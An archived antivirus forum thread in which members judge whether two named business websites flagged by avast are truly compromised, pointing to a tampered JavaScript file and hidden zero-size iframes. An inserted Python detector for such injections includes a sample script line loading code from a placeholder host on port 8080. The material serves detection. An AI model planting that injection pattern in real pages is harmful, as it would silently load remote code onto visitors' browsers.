Author Topic: false positive ?  (Read 4827 times)


Offline newkid215

  • Newbie
  • *
  • Posts: 6
false positive ?
« on: December 02, 2010, 05:34:23 PM »
Hello,
Would someone help to identify whether these two sites are actually virus- or malware-infected, or whether it was a false positive?

hxxp://www.preceptgroup.net/     (reported infected by JS:Illredir-CI [Trj])

hxxp://www.premierfitness.ca/overview   (reported infected with HTML:iframe-inf)

I remember seeing around ten detections of iframe.inf from known business sites.  Does iframe.inf generate many false positive detections?

Some advice please,
Many thanks.  :)
« Last Edit: December 03, 2010, 02:11:14 PM by igor »

Offline Swarnava/Heaven GOD

  • Sr. Member
  • ****
  • Posts: 241
  • Give me the place 2 stand & I shall move the earth
Re: false positive ?
« Reply #1 on: December 02, 2010, 05:52:52 PM »
Working fine here.
If java had true garbage collection, most program would delete themselves upon execution

Offline spg SCOTT

  • Massive Poster
  • ****
  • Posts: 4124
  • There is no magic, only lost physics
    • spg SCOTT
Re: false positive ?
« Reply #2 on: December 02, 2010, 06:08:42 PM »
Hi newkid215,

Please can you deactivate the links in your post (change http to hXXp) to prevent others potentially becoming infected.
EDIT: Thanks igor for doing this :)

1.
Code:
hXXp://www.preceptgroup.net/menumachine/precept_drop_downs/menuspecs.js
This JavaScript file has been hacked, and a malicious site added at the end. It also tries to avoid detection by using port 8080, which obviously doesn't work. (capture.gif)

2.
Code:
hXXp://www.premierfitness.ca/overview
avast! is alerting on a set of iframes that all have zero size (basically hidden). (capture2.gif)

I would say that both sites are infected.

Scott

@Swarnava/Heaven GOD

Based on what?
Why link the siteadvisor green tick?
« Last Edit: December 03, 2010, 07:14:54 PM by spg SCOTT »
“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!”Richard Feynman
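As an added example (not part of the thread, and not avast's detection logic), a small Python checker for the two patterns Scott describes above: zero-size or hidden iframes in a page, and a reference to an external host on a non-standard port appended to the tail of a site's own JavaScript file. The sample HTML, sample JS and hostnames are constructed placeholders, not content from the sites in question.

```python
"""Flag the two injection patterns discussed in this thread: zero-size (hidden)
iframes in a page, and a script reference appended to the tail of a site's own
.js file that points at an external host on a non-standard port."""
import re
from html.parser import HTMLParser

class HiddenIframeFinder(HTMLParser):
    """Collect the src of iframes that are zero-sized or styled invisible."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        width = a.get("width", "").strip().lower()
        height = a.get("height", "").strip().lower()
        style = a.get("style", "").replace(" ", "").lower()
        zero = width in ("0", "0px") or height in ("0", "0px")
        hidden = "display:none" in style or "visibility:hidden" in style
        if zero or hidden:
            self.hits.append(a.get("src", "<no src>"))

def find_hidden_iframes(html: str) -> list:
    parser = HiddenIframeFinder()
    parser.feed(html)
    return parser.hits

# A script/iframe/document.write reference to a host with an explicit port
# (the thread's example used 8080) near the end of a JS file.
TAIL_RE = re.compile(r"(?:document\.write|<script[^>]*src=|<iframe[^>]*src=)"
                     r"[^\n]*?https?://([\w.-]+):(\d{2,5})", re.I)

def find_injected_tail(js: str, tail_chars: int = 400) -> list:
    """Return (host, port) pairs referenced in the tail of a JS file,
    ignoring the standard web ports."""
    return [(h, int(p)) for h, p in TAIL_RE.findall(js[-tail_chars:])
            if p not in ("80", "443")]

# Constructed samples with placeholder hosts, not content from the sites above.
SAMPLE_HTML = ('<p>Welcome</p><iframe src="http://good.example/ad" width="300" height="250">'
               '</iframe><iframe src="http://bad.example/x.php" width="0" height="0"></iframe>'
               '<iframe src="http://bad2.example/" style="display: none"></iframe>')
SAMPLE_JS = ("var menu = {items: 12};\nfunction show() {}\n"
             "document.write('<scr'+'ipt src=\"http://bad.example:8080/j.js\"></scr'+'ipt>');")

if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE_HTML))  # two hidden iframes flagged
    print(find_injected_tail(SAMPLE_JS))     # [('bad.example', 8080)]
```

Run it over a site's own HTML and .js files after a web shield alert; a hit is a lead to inspect by hand, not proof on its own, since legitimate pages also use hidden iframes occasionally.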

Offline Tenko

  • Sr. Member
  • ****
  • Posts: 205
  • Download only known security software.
« Last Edit: December 03, 2010, 01:34:51 PM by Tenko »
WMware:
OS: OpenSUSE 11.3

OS: Win 7
Security: Avast free with OA (onlinearmor)

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 85344
  • No support PMs thanks
Re: false positive ?
« Reply #4 on: December 02, 2010, 06:49:47 PM »
Quote from: newkid215 on December 02, 2010, 05:34:23 PM
Hello,
Would someone help to identify whether these two sites are actually virus- or malware-infected, or whether it was a false positive?
hXXp://www.preceptgroup.net/     (reported infected by JS:Illredir-CI [Trj])
hXXp://www.premierfitness.ca/overview   (reported infected with HTML:iframe-inf)

I remember seeing around ten detections of iframe.inf from known business sites.  Does iframe.inf generate many false positive detections?

On the contrary, the avast web shield has been extremely accurate in its detections in regard to hacked sites; it is IMHO the best. When you consider the slew of hidden iframes to dubious-looking domain names, I would say this is a good detection.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 21.5.2470 (build 21.5.6354.675) UI 1.0.646/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline spg SCOTT

  • Massive Poster
  • ****
  • Posts: 4124
  • There is no magic, only lost physics
    • spg SCOTT
Re: false positive ?
« Reply #5 on: December 03, 2010, 01:28:16 PM »
@Tenko,

You have also posted live links to the sites in question, could you please deactivate them, like in DavidR's post.

Quote from: spg SCOTT on December 02, 2010, 06:08:42 PM
Please can you deactivate the links in your post (change http to hXXp) to prevent others potentially becoming infected.

Scott

Offline Tenko

  • Sr. Member
  • ****
  • Posts: 205
  • Download only known security software.
Re: false positive ?
« Reply #6 on: December 03, 2010, 01:33:42 PM »
I will change it now SCOTT

Offline newkid215

  • Newbie
  • *
  • Posts: 6
Re: false positive ?
« Reply #7 on: December 03, 2010, 04:03:33 PM »
Thank you guys for all the good advice.
Next time I will only post hxxp links.

Thanks

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 85344
  • No support PMs thanks
Re: false positive ?
« Reply #8 on: December 03, 2010, 05:23:18 PM »
You're welcome, I trust that you have now found and dealt with the offending scripts and iframe tags.

Then you only have to deal with the exploit that allowed the site to be hacked.

Offline Swarnava/Heaven GOD

  • Sr. Member
  • ****
  • Posts: 241
  • Give me the place 2 stand & I shall move the earth
Re: false positive ?
« Reply #9 on: December 03, 2010, 06:00:43 PM »
Quote from: spg SCOTT on December 02, 2010, 06:08:42 PM
Hi newkid215,

Please can you deactivate the links in your post (change http to hXXp) to prevent others potentially becoming infected.

1.
Code:
hXXp://www.preceptgroup.net/menumachine/precept_drop_downs/menuspecs.js
This JavaScript file has been hacked, and a malicious site added at the end. It also tries to avoid detection by using port 8080, which obviously doesn't work. (capture.gif)

2.
Code:
hXXp://www.premierfitness.ca/overview
avast! is alerting on a set of iframes that all have zero size (basically hidden). (capture2.gif)

I would say that both sites are infected.

Scott

@Swarnava/Heaven GOD

Based on what?
Why link the siteadvisor green tick?

I scanned it specially with McAfee & Kaspersky; both are working fine :)